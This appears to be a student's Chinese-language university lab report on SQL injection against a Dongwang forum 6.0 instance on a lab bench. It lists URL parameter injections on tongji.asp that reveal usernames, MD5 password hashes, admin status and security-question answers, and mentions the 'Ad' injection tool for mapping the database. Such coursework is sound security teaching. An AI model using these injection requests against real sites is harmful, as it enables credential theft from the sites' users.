1、1北京理工大学珠海学院实验报告ZHUHAI CAMPAUS OF BEIJING INSTITUTE OF TECHNOLOGY班级: 学号: 姓名: 指导教师: 成绩实验题目 实验四 SQL 注入实验 实验时间 一、实验目的:(1) 理解 SQL 注入获取后台用户名、密码的方法(2) 理解 SQL 注入获取后台数据库架构的方法二、实验内容以及步骤:(网络安全/WEB 安全)1、获取后台用户名、密码的方法以动网论坛 6.0 为例,在地址栏中输入 http:/ 实验台的 IP/page6/index.asp 访问论坛首页,通过下图可以看到一共有 2 位注册会员。http:/ 实验台的 IP/Pa
2、ge6/tongji.asp?orders=2&N=10 后显示出了整个论坛中 2 位用户的用户名。2http:/ 实验台的 IP/Page6/tongji.asp?orders=2&N=10%20userclass 后显示出了管理员身份http:/ 实验台的 IP/Page6/tongji.asp?orders=2&N=10%20userid 后显示出了注册次序http:/ 实验台的 IP/Page6/tongji.asp?orders=2&N=10%20userpassword 后显示出了 2 个用户密码,用 md5 加密http:/ 实验台的 IP/Page6/tongji.asp?or
3、ders=2&N=10%20quesion 后显示出了用户忘记密码提示问题3http:/ 实验台的 IP/Page6/tongji.asp?orders=2&N=10%20answer 显示用户忘记密码提示问题的答案 用 md5 进行加密2、获取后台数据库架构用阿 d 注入设置当前库4搜索当前库相关字段三、实验总结:1、通过这次实验,我学习到了 windows 环境的 sql 注入方法,同时对 sql 的安全防御也有了一定的了解。2、在实验台中对网页注入代码文件时,没有找到网页源地址,在同学帮助下,解决了问题。3、实验中需要特别注意在搜索相关网站信息时,注意在网站后面加上“, ”,否则无法显示。
